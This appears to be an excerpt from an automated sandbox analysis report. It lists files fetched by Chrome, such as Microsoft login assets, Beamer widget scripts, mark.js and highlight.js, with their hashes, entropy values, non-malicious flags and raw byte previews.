                                                                                                                                                                                                                Size (bytes):2679
                                                                                                                                                                                                                Entropy (8bit):4.002223519226032
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:8+dtT1FEHhidAKZdA1duTeehOuTbbiZUk5OjqehOuTbUy+yT+:8AbvTfTbxWOvTbUy7T
                                                                                                                                                                                                                MD5:9F7DA5B66146F728EDF23EBCCB6A130E
                                                                                                                                                                                                                SHA1:0D1A53DBD7BE9B73CF8852287D1675C4A1B0CFCB
                                                                                                                                                                                                                SHA-256:4781EAD840873EF03F11E440620CA7F384F836895639F78D6F792383D3D63280
                                                                                                                                                                                                                SHA-512:14A4D95F1C6C5BE2F56D086AC5F517A2638590206E6FB5D10989B6CF954BB3E5AD711B2797D5D5D9F94B51BF2C7C50DE4145DF9A64F804D739D4F6C287BE6305
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,....~.Z~Il..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I5Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V5Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V5Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V5Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V5Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............7.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):15086
                                                                                                                                                                                                                Entropy (8bit):3.896036126265902
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:jAToLSCktSn0EKHSEPc26HoKCMRei14XG2lXRSaHL35s:jATo4M0pHTPc26HoKCGWlBpHLJs
                                                                                                                                                                                                                MD5:1AB63272847D35C254CDB9F69EDC3FCB
                                                                                                                                                                                                                SHA1:1B2DA0323B52F0D192747D4C44261E9FD562E2EA
                                                                                                                                                                                                                SHA-256:0300AD6BAE0AA70A8D864C177FFC7EE044B885ECE245D3C48F7AD966E20B2095
                                                                                                                                                                                                                SHA-512:A07FF0EBA5151536FABD414C5FDDB6BA6102FC15A390319174AB24FA879092BE3B14C3DDDABFF4E3AD648AF72EAD9E2F9291D2EB40560BF54C85DEA91F32A86D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/images/favicon.ico
                                                                                                                                                                                                                Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$...........................P=..P=V.P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=V.P=..............P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=......P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=W.P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=W.P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (472)
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2166
                                                                                                                                                                                                                Entropy (8bit):4.836717236754267
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:3t1HX0+Inj/RCBxw48fkw3lMAw3owazFpECntf3dECW7fbNn:3jdInj/RCBxwnZMQwazFBc
                                                                                                                                                                                                                MD5:C935F9609EA3531B7A5B64FFB104C7C7
                                                                                                                                                                                                                SHA1:9006B437D72693FD95390C8ADDDD4B9FC574DA59
                                                                                                                                                                                                                SHA-256:E9F488B77347F77564789DA74FF2BEA03E779C0E9D4AFE320305E04821F83D75
                                                                                                                                                                                                                SHA-512:692AC8DA4D9E1B978A068E2A113995E61B6A33DBD37BBCB168CE4F4B703BBE54C4EBF62D493CFD2776650B9B653B78D686A182EFDEE71D19E900901E3B9C36E2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:"undefined"===typeof window.HumanJS&&(window.HumanJS={});HumanJS.score=0;HumanJS.init=function(a){HumanJS.callback=a;HumanJS.initMouseListener(HumanJS.incrementScoreLight);HumanJS.initTouchmoveListener(HumanJS.incrementScoreLight);HumanJS.initTouchClickListener(HumanJS.incrementScoreLight);HumanJS.initMouseClickListener(HumanJS.incrementScoreHigh);HumanJS.initKeyboardListener(HumanJS.incrementScoreHigh);HumanJS.initScrollListener(HumanJS.incrementScoreHigh)};.HumanJS.pause=function(a){HumanJS.removeMouseListener(HumanJS.incrementScoreLight);HumanJS.removeKeyboardListener(HumanJS.incrementScoreHigh);HumanJS.removeMouseClickListener(HumanJS.incrementScoreHigh);HumanJS.removeScrollListener(HumanJS.incrementScoreHigh);0<a&&setTimeout(function(){return HumanJS.init(HumanJS.callback)},a)};HumanJS.incrementScoreLight=function(){HumanJS.pause(200);HumanJS.score+=1;HumanJS.callback&&HumanJS.callback(HumanJS.score)};.HumanJS.incrementScoreHigh=function(){HumanJS.pause(200);HumanJS.score+=5;Human
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):3452
                                                                                                                                                                                                                Entropy (8bit):5.117912766689607
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                                                                                                                MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                                                                                                SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                                                                                                SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                                                                                                SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://login.live.com/Me.htm?v=3
                                                                                                                                                                                                                Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):61052
                                                                                                                                                                                                                Entropy (8bit):7.996159932827634
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                                                                                                                                                MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                                                                                                                                SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                                                                                                                                SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                                                                                                                                SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):1435
                                                                                                                                                                                                                Entropy (8bit):7.8613342322590265
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                                                                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                                                                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                                                                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                                                                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                                                                                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17030
                                                                                                                                                                                                                Entropy (8bit):5.591121014597221
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:WCQi+iSDq5426z7YnyFPtWcDUaJUi0ie1AhNHRu+GujiYXvj:dMz7YktWEUaJUi0ie14uluHfj
                                                                                                                                                                                                                MD5:A55BA6D3E1DC033F478A8763D0E94B83
                                                                                                                                                                                                                SHA1:8AF2BC3610C41F9925FED47864FC116C9C1D34C3
                                                                                                                                                                                                                SHA-256:E072ED8DE5601F4788077699F662D817A13CA14E5C84D76353AA7AAEB5E997D5
                                                                                                                                                                                                                SHA-512:9A16EFE43A81320AD62FEDF6326B033ADFCE02FAABFDC1E29A4E81F32FDBC7FC52F3C31591818F895BF68B1295AE4CB0176A87A6535152F16C00751DC59DCAAE
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:/*!***************************************************.* mark.js v8.11.1.* https://markjs.io/.* Copyright (c) 2014.2018, Julian K.hnel.* Released under the MIT license https://git.io/vwTVl.*****************************************************/.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t(require("jquery")):"function"==typeof define&&define.amd?define(["jquery"],t):e.Mark=t(e.jQuery)}(this,function(e){"use strict";e=e&&e.hasOwnProperty("default")?e.default:e;var t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},n=function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")},r=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}return functi
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):950
                                                                                                                                                                                                                Entropy (8bit):6.486495650707563
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:vsaGXos+eT+R6jqR1RKvcxjfejGGLfhxwn2mRYXqrGtkMGTX6G3rGQwkD0rXvl/:iXoNKu6CbKejfNkfknRAJmMfGSQwkgvx
                                                                                                                                                                                                                MD5:C5C4BDC60512F00615A4A3DEB0AD834E
                                                                                                                                                                                                                SHA1:524D0D8FC3C2AE08F17003B7F51CF305B90B6B47
                                                                                                                                                                                                                SHA-256:83F84A0A739D451A9B4C239C2009640959DA00D260383D3893DEAE78C11481AF
                                                                                                                                                                                                                SHA-512:2591D803364AED862B10D87B99320E8906683C1414BECDC6A4FCBEB603A4D05AFB83580899638395D24329BA75ACDF92AD47714C747B068A140791FE66C33A68
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/images/resource-loading.gif
                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............ANIM..........ANMFx...............d...VP8L`.../..6.' . .w*`F @..T..@.........W.AA$[.R..y.~...O.kD.'@}...?.....af.#..@...qDDkC.+.j.C........3ANMFl...*..3..5.....d...VP8LS.../5.... . ...`F @.....@..?........H.....s.WV...........@..^..6.7.k..._..........ANMFj...*..3..5.....d...VP8LQ.../5.... . ...`F @.....@..?.......v...'..9*...^......y`..|...9...nC2=$......ANMFp...*..3..5.....d...VP8LX.../5...' . .w*`F @..T..@.........W.AQ.H.\.pKa..4..?..........Y..y.$k.$.RU.[%...@yB.5.k.9.ANMFd...0..3..).....d...VP8LK.../).... . ...`F @.....@..?.........0...b.D..{1^.{.D.....a{.....H...C.....ANMFd...*..3..5.....d...VP8LL.../5.... . .w*`F @..T..@.........W..H..W....|A8.d.FB.1......u.72.BQM.o.....AANMF^...*..4..5.....d...VP8LE.../5.... .H...`..@.?.......97X`...?..$E..).........".?.z..............ANMFf...*..4..5.....d...VP8LN.../5.... . .w*`F @..T..@.........W.......*|eC.a.FB..D.....q.k..%...5........
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3403)
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):74138
                                                                                                                                                                                                                Entropy (8bit):5.43461756685079
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:agFXvKJ9dEcu+QaDNz+BUfuBI8lr9w98S1wTWpwxWS2Ftq0i4Pw51Flq0yKTx+X+:agFXiJuyqNr9U8rTx+NFDy7MR3xajRK2
                                                                                                                                                                                                                MD5:6EBC8A4021825C16FFDDEAA781F6610A
                                                                                                                                                                                                                SHA1:1E47170F21FAAD7DABE41E6B366A537D5AF80CCF
                                                                                                                                                                                                                SHA-256:13EA2D233956EA4686D171703A5B07FCA139E9A37C83A4B473AFF938821F4D66
                                                                                                                                                                                                                SHA-512:BEF1E2B8688CAECE8E11AB7EA5AA4590A2407C5A554FE5C0D2A9B6C686242A7A2486AEAB26304A249D60056AA3B181155305CE251D43EEDB189A3CE86C9386B1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/js/beamer.js?v=4
                                                                                                                                                                                                                Preview:var _BEAMER_URL="https://app.getbeamer.com/",_BEAMER_ABSOLUTE_URL="",_BEAMER_REACTIONS_KEY="_BEAMER_REACTIONS",_BEAMER_USER_REACTIONS_KEY="_BEAMER_USER_REACTIONS",_BEAMER_EMAIL_PROMPT_LAST_SHOWN="_BEAMER_EMAIL_PROMPT_LAST_SHOWN",_BEAMER_LAST_FEATURE_REQUESTS_ACCESS_DATE="_BEAMER_LAST_FEATURE_REQUESTS_ACCESS_DATE",_BEAMER_LAST_ROADMAP_ACCESS_DATE="_BEAMER_LAST_ROADMAP_ACCESS_DATE",newsURL,lastClickedElement,searchRequest,searchVisible=!1,_savingReaction=!1,_isSwitchingIframe=!1,_uploadingAttachments=.0,_uploadedPictureIds=[],_headerSize;if("undefined"===typeof _refUrl)var _refUrl;.var BeamerEmbed={init:function(a,b,c){$(function(){"undefined"!==typeof a&&a?(_headerSize=$(".header").outerHeight()+10,$(".news").css("padding-top",_headerSize)):(BeamerEmbed.loaded(),trackGoogleAnalytics("open"));"undefined"===typeof window._page&&(window._page=0);initTextarea();initAjax();initPosts();initMessageHandler();try{c&&(_BEAMER_ABSOLUTE_URL="https://app.getbeamer.com")}catch(d){}buildNewsUrl();$(do
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):116345
                                                                                                                                                                                                                Entropy (8bit):7.997378915283506
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                                                                                                                                                                MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                                                                                                                                                                SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                                                                                                                                                                SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                                                                                                                                                                SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_510f960da65b56e0607c.js
                                                                                                                                                                                                                Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):1148
                                                                                                                                                                                                                Entropy (8bit):4.9396701945074275
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:e3LqHY2V9jYaCcE8JYX6wXumYd/0YI90YxJX2Nk:e3LqHYkjVm8J6XumC/0ZSUJX9
                                                                                                                                                                                                                MD5:BF6C14925E66EDB1526B6C9489B3C042
                                                                                                                                                                                                                SHA1:EE593952684A791317EE8B77AD096E729DEC649E
                                                                                                                                                                                                                SHA-256:8DAD33FA53D17143D8862FAC76D24910A957982332C3126D08BC4243329DD8AD
                                                                                                                                                                                                                SHA-512:130759AF14780149BE01198BE9DC6C9A0530EC92C08B19E32E5D3A1AAAE42DE239DD086895EEC5F0600188B926408C43BB30997D718563D863E810FD2291ABBF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/styles/highlight-js.css
                                                                                                                                                                                                                Preview:/*..github.com style (c) Vasily Polovnyov <vast@whiteants.net>..*/...hljs {. display: block;. overflow-x: auto;. padding: 0.5em;. color: #333;. background: #f8f8f8;.}...hljs-comment,..hljs-quote {. color: #998;. font-style: italic;.}...hljs-keyword,..hljs-selector-tag,..hljs-subst {. color: #333;. font-weight: bold;.}...hljs-number,..hljs-literal,..hljs-variable,..hljs-template-variable,..hljs-tag .hljs-attr {. color: #008080;.}...hljs-string,..hljs-doctag {. color: #d14;.}...hljs-title,..hljs-section,..hljs-selector-id {. color: #900;. font-weight: bold;.}...hljs-subst {. font-weight: normal;.}...hljs-type,..hljs-class .hljs-title {. color: #458;. font-weight: bold;.}...hljs-tag,..hljs-name,..hljs-attribute {. color: #000080;. font-weight: normal;.}...hljs-regexp,..hljs-link {. color: #009926;.}...hljs-symbol,..hljs-bullet {. color: #990073;.}...hljs-built_in,..hljs-builtin-name {. color: #0086b3;.}...hljs-meta {. color: #999;. font-weight: bold;.}...hljs-deleti
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):100238
                                                                                                                                                                                                                Entropy (8bit):5.480726332440175
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:jRITeUbPhxXDfi4Gu68FsNG5wnYQKkIryjP9t/A2p+oh1Q1lGtOQfnWs+fPp9Zt:UeU7hxtGjosc2nYB297Iu//+t
                                                                                                                                                                                                                MD5:4D4F4C2AEFBF9B8FF7F9B53360E9408F
                                                                                                                                                                                                                SHA1:12DA728DFE56ECD3D98C27F32309B0F33A412B92
                                                                                                                                                                                                                SHA-256:EF81CAD1EC16D2674C980EEB7B95105520EAAFC06DD93F3931FE77D8B2102063
                                                                                                                                                                                                                SHA-512:B0C0CCA746CABC6AD9F9F3D0862CBDF065B5EB11D7C7E6C2756F1FB4DDC43D188F21144FE3ADD92EAF13737D6AEA395F108C25A5BE6E48D84EBC158624009611
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/js/highlight.pack.js
                                                                                                                                                                                                                Preview:/*. Highlight.js 10.1.2 (edd73d24). License: BSD-3-Clause. Copyright (c) 2006-2020, Ivan Sagalaev.*/.var hljs=function(){"use strict";function e(n){Object.freeze(n);var t="function"==typeof n;return Object.getOwnPropertyNames(n).forEach((function(r){!Object.hasOwnProperty.call(n,r)||null===n[r]||"object"!=typeof n[r]&&"function"!=typeof n[r]||t&&("caller"===r||"callee"===r||"arguments"===r)||Object.isFrozen(n[r])||e(n[r])})),n}class n{constructor(e){void 0===e.data&&(e.data={}),this.data=e.data}ignoreMatch(){this.ignore=!0}}function t(e){return e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#x27;")}function r(e,...n){var t={};for(const n in e)t[n]=e[n];return n.forEach((function(e){for(const n in e)t[n]=e[n]})),t}function a(e){return e.nodeName.toLowerCase()}var i=Object.freeze({__proto__:null,escapeHTML:t,inherit:r,nodeStream:function(e){var n=[];return function e(t,r){for(var i=t.firstChild;i;i=i.nextSibling)3===i.nodeType?r
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1435
                                                                                                                                                                                                                Entropy (8bit):7.8613342322590265
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                                                                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                                                                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                                                                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                                                                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
